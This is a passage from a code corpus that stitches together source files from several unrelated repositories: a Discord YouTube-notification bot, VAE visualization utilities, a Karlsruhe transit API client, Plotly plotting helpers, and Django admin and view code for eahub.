async def custom_message_command(self, ctx: extlib.Context, option: int):
await sub_view_msg(self.bot, ctx, option)
async def setup(bot: extlib.Bot):
await bot.add_application_cog(Setup(bot))
```
#### File: bot/views/removal_view.py
```python
import io
import asyncio
import aiotube
import discord
from asyncdeta import Field
from bot.extras.emojis import Emo
from extlib import Context, Bot
class OptionView(discord.ui.View):
def __init__(self, ctx: Context):
self.ctx = ctx
super().__init__()
self.value = None
@discord.ui.button(label='Welcome', style=discord.ButtonStyle.green, emoji=f'{Emo.IMG}')
async def welcome(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 1
self.stop()
@discord.ui.button(label='Upload', style=discord.ButtonStyle.blurple, emoji=f'{Emo.YT}')
async def upload(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 2
self.stop()
@discord.ui.button(label='Live', style=discord.ButtonStyle.red, emoji=f'{Emo.LIVE}')
async def live(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 3
self.stop()
async def on_timeout(self) -> None:
pass
async def create_menu(loop: asyncio.AbstractEventLoop, channel_ids: list):
def get_channel_names():
container = []
for channel_id in channel_ids:
try:
channel = aiotube.Channel(channel_id)
container.append(channel.name)
except Exception:
container.append('Invalid Channel')
return container
channel_names = await loop.run_in_executor(None, get_channel_names)
return [discord.SelectOption(label=name or 'Invalid Name', value=ch_id, emoji=Emo.YT)
for name, ch_id in zip(channel_names, channel_ids)][:24]
class ChannelMenu(discord.ui.Select):
def __init__(self, bot: Bot, ctx: Context, menu: list):
self.bot = bot
self.ctx = ctx
super().__init__(min_values=1, max_values=1, options=menu, placeholder='existing youtube channels')
async def callback(self, interaction: discord.Interaction):
channel_id = self.values[0]
if interaction.user == self.ctx.author:
if channel_id == '0':
await self.ctx.delete_response()
return
ch = aiotube.Channel(channel_id)
info = ch.info
emd = discord.Embed(
title=f'🚮 {info["name"]}',
description=f'\n> **Subs:** {info["subscribers"]}'
f'\n> **Views:** {info["views"]}'
f'\n> **Id:** {info["id"]}',
url=info["url"], color=0xc4302b)
banner_url = info['banner']
avatar_url = info['avatar']
if banner_url and banner_url.startswith('http'):
emd.set_image(url=banner_url)
if avatar_url and avatar_url.startswith('http'):
emd.set_thumbnail(url=avatar_url)
await self.ctx.edit_response(embed=emd, view=None)
try:
self.bot.cached[self.ctx.guild.id].get('CHANNELS').pop(channel_id)
except KeyError:
pass
await self.bot.db.add_field(
key=str(self.ctx.guild.id),
field=Field('CHANNELS', self.bot.cached[self.ctx.guild.id].get('CHANNELS')),
force=True
)
async def sub_view_remove(bot: Bot, ctx: Context, value: int):
if value == 1:
data = bot.cached[ctx.guild.id].get('CHANNELS')
if data:
menu = await create_menu(ctx.client.loop, list(data))
menu.insert(0, discord.SelectOption(label='cancel', value='0', emoji=Emo.CROSS))
view = discord.ui.View()
view.add_item(ChannelMenu(bot, ctx, menu))
await ctx.send_followup(
embed=discord.Embed(description='> Please select a channel from menu below:'), view=view)
else:
await ctx.send_followup(embed=discord.Embed(description='> There is no channel to remove.'))
elif value == 2:
bot.cached[ctx.guild.id]['RECEPTION'] = None
await ctx.send_followup(embed=discord.Embed(description='> Welcomer has been removed.'))
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', None), force=True)
elif value == 3:
bot.cached[ctx.guild.id]['PINGROLE'] = None
await ctx.send_followup(embed=discord.Embed(description='> Ping role has been removed.'))
await bot.db.add_field(key=str(ctx.guild.id), field=Field('PINGROLE', None), force=True)
elif value == 4:
data = bot.cached[ctx.guild.id].get('CUSTOM')
if data:
view = OptionView(ctx)
emd = discord.Embed(description='> Tap a button to remove corresponding message:')
await ctx.send_followup(embed=emd, view=view)
await view.wait()
if view.value == 1:
data['welcome'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Welcome message has been removed.'), view=None)
elif view.value == 2:
data['upload'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Upload message has been removed.'), view=None)
elif view.value == 3:
data['live'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Live message has been removed.'), view=None)
else:
await ctx.send_followup('> 👀 you have not set any custom messages yet!')
```
#### File: bot/views/welcomer_view.py
```python
import discord
import asyncio
import aiohttp
from asyncdeta import Field
from bot.extras.emojis import *
from extlib import Context, Bot
async def sub_view_welcomer(bot: Bot, ctx: Context, image: discord.Attachment, reception: discord.TextChannel):
async def check_reception_perms():
bot_can = reception.permissions_for(ctx.me)
if not bot_can.send_messages:
embed = discord.Embed(
title=f'{Emo.WARN} I cannot set that as a reception',
description=f'I cannot set {reception.mention} as reception'
f'\nBecause I am unable to `send messages` in that channel'
)
await ctx.edit_response(embed=embed)
return False
elif not bot_can.attach_files:
embed = discord.Embed(
title=f'{Emo.WARN} I cannot set that as a reception',
description=f'I cannot set {reception.mention} as reception'
f'\nBecause I am unable to `attach files` in that channel'
)
await ctx.send_followup(embed=embed)
return False
else:
return True
if reception and image:
if await check_reception_perms():
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', str(reception.id)), force=True)
emd = discord.Embed(
title=f'{Emo.CHECK} Welcome Card Updated',
description=f'Bound to <#{reception.id}>',
)
emd.set_image(url=image.url)
await ctx.send_followup(embed=emd)
bot.cached[ctx.guild.id]['RECEPTION'] = str(reception.id)
async with aiohttp.ClientSession() as session:
async with session.get(image.url) as resp:
chunks = await resp.read()
await bot.drive.upload(file_name=f'covers/{ctx.guild.id}_card.png', content=chunks)
elif reception:
if await check_reception_perms():
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', str(reception.id)), force=True)
emd = discord.Embed(
title=f'{Emo.CHECK} Reception Updated',
description=f'Current set reception channel is {reception.mention}'
f'\nThis channel will be used to send welcome cards')
await ctx.send_followup(embed=emd)
bot.cached[ctx.guild.id]['RECEPTION'] = str(reception.id)
```
#### File: jnsougata/PixeL/main.py
```python
import os
import discord
import extlib
from asyncdeta import Deta
intent = discord.Intents().default()
intent.members = True
class PixeL(extlib.Bot):
__dirs__ = os.listdir('bot/cogs')
def __init__(self):
super().__init__(intents=intent, help_command=None, command_prefix='µ', chunk_guilds_at_startup=False)
self.init_ext = ['bot.cogs.' + file[:-3] for file in self.__dirs__ if file.endswith('.py')]
self.db = None
self.drive = None
self.cached = None
async def on_ready(self):
print(f'Logged in as {self.user} (ID: {self.user.id})')
print('------')
async def setup_hook(self) -> None:
deta = Deta(os.getenv('DETA_TOKEN'))
await deta.connect(session=self.http._HTTPClient__session, loop=self.loop)
self.db = deta.base('01PIXEL')
self.drive = deta.drive('PixeL_@11223344')
await self.build_cache()
for ext in self.init_ext:
await self.load_extension(ext)
async def build_cache(self):
fields = await self.db.fetch_all()
self.cached = {int(field.pop('key')): field for field in fields}
pixel = PixeL()
pixel.run(os.getenv('DISCORD_TOKEN'))
``` |
{
"source": "jnsougata/rich-embed",
"score": 2
} |
#### File: rich-embed/src/ping.py
```python
import discord
import app_util
class Ping(app_util.Cog):
def __init__(self, bot: app_util.Bot):
self.bot = bot
@app_util.Cog.command(
command=app_util.SlashCommand(
name='ping', description='shows avg ping of client'
),
guild_id=877399405056102431
)
async def command(self, ctx: app_util.Context):
await ctx.send_response(embed=discord.Embed(title=f'{self.bot.latency * 1000:.2f}ms'))
def setup(bot: app_util.Bot):
bot.add_application_cog(Ping(bot))
``` |
{
"source": "jnsrch/disentangling-vae-cwt",
"score": 2
} |
#### File: disentangling-vae-cwt/utils/viz_helpers.py
```python
import random
import numpy as np
from PIL import Image, ImageDraw
import pandas as pd
import torch
import imageio
from torchvision.utils import make_grid
from utils.datasets import get_dataloaders
from utils.helpers import set_seed
FPS_GIF = 12
def get_samples(dataset, num_samples, idcs=[]):
""" Generate a number of samples from the dataset.
Parameters
----------
dataset : str
The name of the dataset.
num_samples : int, optional
The number of samples to load from the dataset
idcs : list of ints, optional
List of indices to of images to put at the begning of the samples.
"""
data_loader = get_dataloaders(dataset,
batch_size=1,
shuffle=idcs is None)
idcs += random.sample(range(len(data_loader.dataset)), num_samples - len(idcs))
samples = torch.stack([data_loader.dataset[i][0] for i in idcs], dim=0)
print("Selected idcs: {}".format(idcs))
return samples
def sort_list_by_other(to_sort, other, reverse=True):
"""Sort a list by an other."""
return [el for _, el in sorted(zip(other, to_sort), reverse=reverse)]
# TO-DO: clean
def read_loss_from_file(log_file_path, loss_to_fetch):
""" Read the average KL per latent dimension at the final stage of training from the log file.
Parameters
----------
log_file_path : str
Full path and file name for the log file. For example 'experiments/custom/losses.log'.
loss_to_fetch : str
The loss type to search for in the log file and return. This must be in the exact form as stored.
"""
EPOCH = "Epoch"
LOSS = "Loss"
logs = pd.read_csv(log_file_path)
df_last_epoch_loss = logs[logs.loc[:, EPOCH] == logs.loc[:, EPOCH].max()]
df_last_epoch_loss = df_last_epoch_loss.loc[df_last_epoch_loss.loc[:, LOSS].str.startswith(loss_to_fetch), :]
df_last_epoch_loss.loc[:, LOSS] = df_last_epoch_loss.loc[:, LOSS].str.replace(loss_to_fetch, "").astype(int)
df_last_epoch_loss = df_last_epoch_loss.sort_values(LOSS).loc[:, "Value"]
return list(df_last_epoch_loss)
def add_labels(input_image, labels):
"""Adds labels next to rows of an image.
Parameters
----------
input_image : image
The image to which to add the labels
labels : list
The list of labels to plot
"""
new_width = input_image.width + 100
new_size = (new_width, input_image.height)
new_img = Image.new("RGB", new_size, color='white')
new_img.paste(input_image, (0, 0))
draw = ImageDraw.Draw(new_img)
for i, s in enumerate(labels):
draw.text(xy=(new_width - 100 + 0.005,
int((i / len(labels) + 1 / (2 * len(labels))) * input_image.height)),
text=s,
fill=(0, 0, 0))
return new_img
def make_grid_img(tensor, **kwargs):
"""Converts a tensor to a grid of images that can be read by imageio.
Notes
-----
* from in https://github.com/pytorch/vision/blob/master/torchvision/utils.py
Parameters
----------
tensor (torch.Tensor or list): 4D mini-batch Tensor of shape (B x C x H x W)
or a list of images all of the same size.
kwargs:
Additional arguments to `make_grid_img`.
"""
grid = make_grid(tensor, **kwargs)
img_grid = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0)
img_grid = img_grid.to('cpu', torch.uint8).numpy()
return img_grid
def get_image_list(image_file_name_list):
image_list = []
for file_name in image_file_name_list:
image_list.append(Image.open(file_name))
return image_list
def arr_im_convert(arr, convert="RGBA"):
"""Convert an image array."""
return np.asarray(Image.fromarray(arr).convert(convert))
def plot_grid_gifs(filename, grid_files, pad_size=7, pad_values=255):
"""Take a grid of gif files and merge them in order with padding."""
grid_gifs = [[imageio.mimread(f) for f in row] for row in grid_files]
n_per_gif = len(grid_gifs[0][0])
# convert all to RGBA which is the most general => can merge any image
imgs = [concatenate_pad([concatenate_pad([arr_im_convert(gif[i], convert="RGBA")
for gif in row], pad_size, pad_values, axis=1)
for row in grid_gifs], pad_size, pad_values, axis=0)
for i in range(n_per_gif)]
imageio.mimsave(filename, imgs, fps=FPS_GIF)
def concatenate_pad(arrays, pad_size, pad_values, axis=0):
"""Concatenate lsit of array with padding inbetween."""
pad = np.ones_like(arrays[0]).take(indices=range(pad_size), axis=axis) * pad_values
new_arrays = [pad]
for arr in arrays:
new_arrays += [arr, pad]
new_arrays += [pad]
return np.concatenate(new_arrays, axis=axis)
``` |
{
"source": "jns-rch/kvv-timetable",
"score": 3
} |
#### File: jns-rch/kvv-timetable/kvvapi.py
```python
import requests
import pandas as pd
# ToDo: Make own function for API KEY checking
with open("API_KEY.txt") as key_file:
API_KEY = key_file.read()
API_BASE = "https://live.kvv.de/webapp"
REQUEST_TYPES = ["stops_by_name",
"stops_by_id",
"departues_by_stop",
"departues_by_route"]
def kvv_request(request_string):
"""Sends a REST call to "https://live.kvv.de/webapp/"
"""
r = requests.get(request_string)
try:
r.raise_for_status()
except requests.exceptions.HTTPError as error:
ValueError(f"Error in Request: {error}")
else:
return r.json()
def create_request_string(request_type, name="name", stop_id="0", line="S1", max_infos=10):
"""Creates a request string
"""
if request_type == "stops_by_name":
request_string = f"{API_BASE}/stops/byname/{name}?key={API_KEY}"
elif request_type == "stops_by_id":
request_string = f"{API_BASE}/stops/bystop/{stop_id}?key={API_KEY}"
elif request_type == "departues_by_stop":
request_string = f"{API_BASE}/departures/bystop/{stop_id}?maxInfos={max_infos}&key={API_KEY}"
elif request_type == "departues_by_route":
request_string = f"{API_BASE}/departures/byroute/{line}/{stop_id}?maxInfos={max_infos}&key={API_KEY}"
return request_string
def create_departure_dataframe(dict):
"""Creates a dataframe with departures for stop out of a dict
"""
return pd.DataFrame(dict["departures"])
def update_departure_dataframe(stop_id="0", max_infos=10):
"""Updates the departure dataframe by calling a REST request
"""
request_string = create_request_string(request_type = "departues_by_stop", stop_id=stop_id, max_infos=max_infos)
response = kvv_request(request_string)
departures = create_departure_dataframe(response)
# Place modifications here
return departures
def find_stop_id_by_name(data, stop_name):
"""Search for stop_id in Open Transport Data
"""
stop_id_series = data["stops"][
(data["stops"]["stop_name"] == stop_name) &
(~data["stops"]["stop_id"].str.match("Parent"))
]["stop_id"]
def split(x):
y = x.split(":")[0:3]
return ":".join(y)
stop_id_series = stop_id_series.apply(split)
if len(stop_id_series.unique()) == 1:
unique_stop_id = stop_id_series.unique()[0]
else:
ValueError("Cannot found unique id")
return unique_stop_id
def convert_stop_id_for_request(stop_id):
"""Convert stop_id to format for REST request
"""
string_as_list = stop_id.split(":")
string_as_list[1] = str(int(string_as_list[1]))
string_as_list[2] = str(int(string_as_list[2]))
return ":".join(string_as_list)
def request_stop_id_by_name(name):
"""Do a REST request do get stop_id by stop name
"""
request_string = create_request_string(request_type = "stops_by_name", name=name)
response = kvv_request(request_string)
return response["stops"][0]["id"]
def search_for_stop_id_by_name(name):
"""Do a REST request do for searching a stop_id by inserting only fragment
"""
request_string = create_request_string(request_type = "stops_by_name", name=name)
response = kvv_request(request_string)
return response["stops"]
``` |
{
"source": "jns-rch/whatsapp-analytics",
"score": 4
} |
#### File: jns-rch/whatsapp-analytics/plotly_plots.py
```python
import plotly.express as px
from plotly.subplots import make_subplots
class Plotter():
def __init__(self, title_x=0.5, title_font_size=24, font_size=14, template='plotly_white',
autosize=True, margin={"l":0, "r":0, "t":120, "b":0},
color_discrete_sequence=px.colors.qualitative.T10):
self.title_x = title_x
self.title_font_size = title_font_size
self.font_size = font_size
self.template = template
self.autosize = autosize
self.color_discrete_sequence = color_discrete_sequence
self.margin = margin
def standardize_plot(self, fig):
fig.update_layout(title_font_size=self.title_font_size,
title_x=self.title_x,
font_size=self.font_size,
template=self.template,
autosize=self.autosize,
margin=self.margin,
legend={"orientation":"h", "y":-0.3}
)
return fig
def barplot(self, data, x, y, color=None, barmode=None, title_text=None,
legend_title_text=None, xaxis_title=None, yaxis_title=None,
xtickvals=None, ytickvals=None, xtickangle=None, ytickangle=None):
fig = px.bar(data_frame=data, x=x, y=y, color=color, barmode=barmode,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def pieplot(self, data, values, names, color=None, title_text=None,
legend_title_text=None):
fig = px.pie(data_frame=data, values=values, names=names, color=color,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text)
fig = self.standardize_plot(fig)
return fig
def histogram(self, data, x, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.histogram(data_frame=data, x=x, color=color,
color_discrete_sequence = self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def boxplot(self, data, x=None, y=None, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.box(data, x, y, color=color,
color_discrete_sequence = self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def lineplot(self, data, x, y, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.line(data_frame=data, x=x, y=y, color=color,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
``` |
{
"source": "jnstockley/raspberrypi-smart-tv",
"score": 2
} |
#### File: jnstockley/raspberrypi-smart-tv/installer.py
```python
import os
# System update of Pi
def updatePi():
os.system("sudo apt update && sudo apt upgrade -y")
# Install required dependencies
def dependencies():
os.system("sudo apt install python3 steamlink -y")
# Install python dependencies
def pythonDependencies():
os.system("pip3 install pynput flask")
os.system("pip3 install -U flask_cors")
#I nstall media browser
def mediaBrowser():
os.system("curl -fsSL https://pi.vpetkov.net -o ventz-media-pi")
os.system("sh ventz-media-pi")
# Install PiTV
def installPiTV():
os.system("mkdir /home/pi/PiTV")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/PiTV.py")
os.system("mv /home/pi/PiTV.py /home/pi/PiTV")
# Install Uified Remote Server (if selected)
def urServerInstall():
os.system("cd ~")
os.system("wget -O urserver.deb http://www.unifiedremote.com/d/rpi-deb")
os.system("sudo dpkg -i urserver.deb")
# Uified Remote Server (if selected)
def runUrserver():
os.system("/opt/urserver/urserver-start")
# Install Parsec Gaming (if selected and supported)
def parsecInstall():
piV = os.popen("cat /proc/cpuinfo | grep Model").read()
if("Pi 4" not in piV):
os.system("wget https://s3.amazonaws.com/parsec-build/package/parsec-rpi.deb")
os.system("sudo dpkg -i parsec-rpi.deb")
else:
print("Parsec is not yet supported on your Raspberry Pi!")
# Install basic webUI (if selected)
def webUIInstall():
os.system("sudo apt install apache2 -y")
os.system("sudo chown pi:pi /var/www/html/")
os.system("mkdir /var/www/html/PiTV/")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/web/main.js")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/web/index.html")
os.system("mv /home/pi/index.html /var/www/html/PiTV")
os.system("mv /home/pi/main.js /var/www/html/PiTV")
# Install the screensaver
def screensaverInstall():
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/index.html")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/script.js")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/settings.json")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/style.css")
os.system("mkdir /var/www/html/screensaver")
os.system("mv /home/pi/index.html /var/www/html/screensaver")
os.system("mv /home/pi/script.js /var/www/html/screensaver")
os.system("mv /home/pi/settings.json /var/www/html/screensaver")
os.system("mv /home/pi/style.css /var/www/html/screensaver")
# Make PiTV start on boot
def autoStart():
os.system("mkdir /home/pi/.config/autostart || echo 'Autostart folder exists'")
os.system('echo "[Desktop Entry]\n\
Type=Application\n\
Name=PiTV\n\
Exec=/usr/bin/python3 /home/pi/PiTV/PiTV.py\
" >> /home/pi/.config/autostart/PiTV.desktop')
# Clean up uneeded files
def cleanUp():
os.system("rm /home/pi/urserver.deb")
os.system("rm /home/pi/installer.py")
# Prompt for reboot
def reboot():
reboot = input("Would you like to reboot now? (Y/N): ")
if("y" in reboot or "Y" in reboot):
os.system("sudo reboot")
else:
print("Please reboot your Raspberry Pi before runnig PiTV!")
# Runs the program
if __name__ == '__main__':
urserver = input("Do you want to install Unified Remote Server? (Y/N): ")
webUI = input("Do you want to install the Web UI? (Y/N): ")
parsec = input("Do you want to install Parsec? (Pi 3 supported only) (Y/N): ")
updatePi()
dependencies()
pythonDependencies()
mediaBrowser()
installPiTV()
if"y" in parsec or "Y" in parsec:
parsecInstall()
if"y" in urserver or "Y" in urserver:
urServerInstall()
if"y" in webUI or "Y" in webUI:
webUIInstall()
autoStart()
if"y" in urserver or "Y" in urserver:
runUrserver()
screensaverInstall()
cleanUp()
reboot()
``` |
{
"source": "jnsxlx/ODE",
"score": 3
} |
#### File: jnsxlx/ODE/ODE.py
```python
import numpy as np
from scipy import integrate
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
import scipy.linalg as la
###Forward Euler Method
##delta_t 0.0012
delta_x = 0.05
delta_t = 0.0012
x_eval = np.arange(0.0, 1.0 + delta_x, delta_x)
t_eval = np.arange(0.0, 0.06 + delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0,len(x_eval)):
if x_eval[i] < 0.5:
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
for k in range(0, len(t_eval) - 1):
for i in range(1,len(x_eval) - 1):
U[k + 1, i] = U[k, i] + ratio * (U[k, i + 1] - 2.0 * U[k, i] + U[k, i - 1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 10, cstride=1)
plt.title('Forward Euler Method with Delta t 0.0012')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
##delta_t 0.0013
delta_t = 0.0013
t_eval = np.arange(0.0, 0.06+delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0, len(x_eval)):
if x_eval[i] < 0.5:
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
for k in range(0,len(t_eval) - 1):
for i in range(1,len(x_eval) - 1):
U[k + 1, i] = U[k,i] + ratio * (U[k, i + 1] - 2.0 * U[k, i] + U[k, i - 1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 10, cstride=1)
plt.title('Forward Euler Method with Delta t 0.0013')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0,0.06])
plt.ylim([0,1.0])
###Backward Euler method
##delta_t 0.005
delta_t = 0.005
t_eval = np.arange(0.0, 0.06 + delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0,len(x_eval)):
if (x_eval[i] < 0.5):
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
A = -2.0 * np.eye(len(x_eval)) + 1.0 * np.eye(len(x_eval), k=1) + 1.0 * np.eye(len(x_eval), k = -1)
A[0, :] = 0
A[:, 0] = 0
A[-1, :] = 0
A[:, -1] = 0
I = np.eye(len(x_eval))
for k in range(0, len(t_eval) - 1):
U[k+1, :] = la.solve(I - ratio * A, U[k, :])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 1, cstride=1)
plt.title('Backward Euler method with Delta t 0.005')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
###crank-nicolson
##delta_t 0.005
ratio = delta_t / (2.0 * (delta_x**2.0))
for k in range(0,len(t_eval)-1):
U[k + 1, :] = la.solve(I - ratio * A, np.dot(U[k, :], I + ratio * A))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 1, cstride=1)
plt.title('Crank-Nicolson with Delta t 0.005')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
###finite difference
ratio = 1.0 / (delta_x**2.0)
def func(y, t):
return ratio * np.dot(A,y)
dt = 1.0e-3
y_t = np.arange(0, 0.06 + dt, dt)
y_0 = np.zeros(x_eval.shape)
for i in range(0,len(x_eval)):
if (x_eval[i] < 0.5):
y_0[i] = 2.0 * x_eval[i]
else:
y_0[i] = 2.0 - 2.0 * x_eval[i]
X, T = np.meshgrid(x_eval, y_t)
sol = integrate.odeint(func, y_0, y_t)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, sol, rstride = 10, cstride=1)
plt.title('Finite Difference Method')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0,0.06])
plt.ylim([0,1.0])
plt.show()
``` |
{
"source": "jnsxlx/SVM",
"score": 3
} |
#### File: jnsxlx/SVM/test.py
```python
import unittest
import numpy as np
from model.self_multiclass import MulticlassSVM
class TestSklearn(unittest.TestCase):
def setUp(self):
self.X_train = TestSklearn.mnist[:len(TestSklearn.mnist)//2, 1:]
self.y_train = (TestSklearn.mnist[:len(TestSklearn.mnist)//2, 0]
.astype(np.int))
self.X_test = TestSklearn.mnist[len(TestSklearn.mnist)//2:, 1:]
self.y_test = (TestSklearn.mnist[len(TestSklearn.mnist)//2:, 0]
.astype(np.int))
@classmethod
def setUpClass(cls):
super(TestSklearn, cls).setUpClass()
print('Loading data...')
cls.mnist = np.loadtxt('data/mnist_test.csv', delimiter=',')
def test_score_shape(self):
msvm = MulticlassSVM('ovr')
msvm.fit(self.X_train, self.y_train)
scores = msvm.scores_ovr_student(self.X_test)
self.assertTrue(scores.shape[0] == 5000 and scores.shape[1] == 10)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jnsya/eahub.org",
"score": 2
} |
#### File: eahub/base/admin.py
```python
import django_admin_relation_links
from authtools import admin as authtools_admin
from django.contrib import admin
from rangefilter.filter import DateRangeFilter
from solo.admin import SingletonModelAdmin
from ..profiles import models as profiles_models
from . import models
@admin.register(models.User)
class UserAdmin(
django_admin_relation_links.AdminChangeLinksMixin, authtools_admin.UserAdmin
):
list_select_related = ["profile"]
list_display = [
"is_active",
"email",
"profile_link",
"is_profile_approved",
"date_joined",
"last_login",
"is_superuser",
"is_staff",
"is_profile_public",
]
change_links = ["profile"]
list_filter = [
"is_superuser",
"is_staff",
"is_active",
"profile__is_approved",
"profile__is_public",
("date_joined", DateRangeFilter),
("last_login", DateRangeFilter),
]
search_fields = ["email", "profile__name"]
actions = ["approve_profiles"]
def is_profile_approved(self, user):
profile = get_profile(user)
if profile is None:
return profile
return profile.is_approved
is_profile_approved.short_description = "Approved?"
is_profile_approved.boolean = True
def approve_profiles(self, request, queryset):
profiles_models.Profile.objects.filter(user__in=queryset).update(
is_approved=True
)
approve_profiles.short_description = "Approve selected users' profiles"
approve_profiles.allowed_permissions = ["change"]
def is_profile_public(self, user):
profile = get_profile(user)
if profile is None:
return profile
return profile.is_public
is_profile_public.short_description = "Public?"
is_profile_public.boolean = False
def get_profile(user):
try:
return user.profile
except profiles_models.Profile.DoesNotExist:
return None
@admin.register(models.MessagingLog)
class MessagingLogAdmin(admin.ModelAdmin):
list_display = [
"sender_email",
"recipient_email",
"recipient_type",
"send_action_uuid",
"time",
]
list_filter = [
"recipient_type",
("time", DateRangeFilter),
]
search_fields = ["sender", "recipient"]
admin.site.register(models.FeedbackURLConfig, SingletonModelAdmin)
```
#### File: eahub/localgroups/views.py
```python
import uuid
from django import urls
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import mixins as auth_mixins
from django.contrib.auth.decorators import login_required
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import PermissionDenied
from django.core.mail import EmailMultiAlternatives, send_mail
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect
from django.template.loader import render_to_string
from django.urls import reverse
from django.views.decorators.http import require_POST
from django.views.generic import detail as detail_views
from django.views.generic import edit as edit_views
from flags.state import flag_enabled
from rules.contrib import views as rules_views
from ..base.models import FeedbackURLConfig, MessagingLog
from ..base.utils import get_admin_email
from ..base.views import ReportAbuseView, SendMessageView
from ..profiles.models import Profile
from .forms import LocalGroupForm
from .models import LocalGroup
class LocalGroupCreateView(
auth_mixins.LoginRequiredMixin,
auth_mixins.PermissionRequiredMixin,
edit_views.CreateView,
):
model = LocalGroup
form_class = LocalGroupForm
template_name = "eahub/edit_group.html"
permission_required = "localgroups.create_local_group"
def get_initial(self):
initial = super().get_initial()
user = self.request.user
if hasattr(user, "profile"):
initial["organisers"] = [user]
return initial
def get_form_kwargs(self):
return {**super().get_form_kwargs(), "user": self.request.user}
def form_valid(self, form):
form.instance.geocode()
self.object = form.save()
send_mail_on_change(
self.request, "create_group.txt", self.object.name, self.object.slug
)
return super().form_valid(form)
class LocalGroupDetailView(detail_views.DetailView):
queryset = LocalGroup.objects.filter(is_public=True)
template_name = "eahub/group.html"
context_object_name = "group"
class LocalGroupUpdateView(rules_views.PermissionRequiredMixin, edit_views.UpdateView):
queryset = LocalGroup.objects.filter(is_public=True)
form_class = LocalGroupForm
template_name = "eahub/edit_group.html"
permission_required = "localgroups.change_local_group"
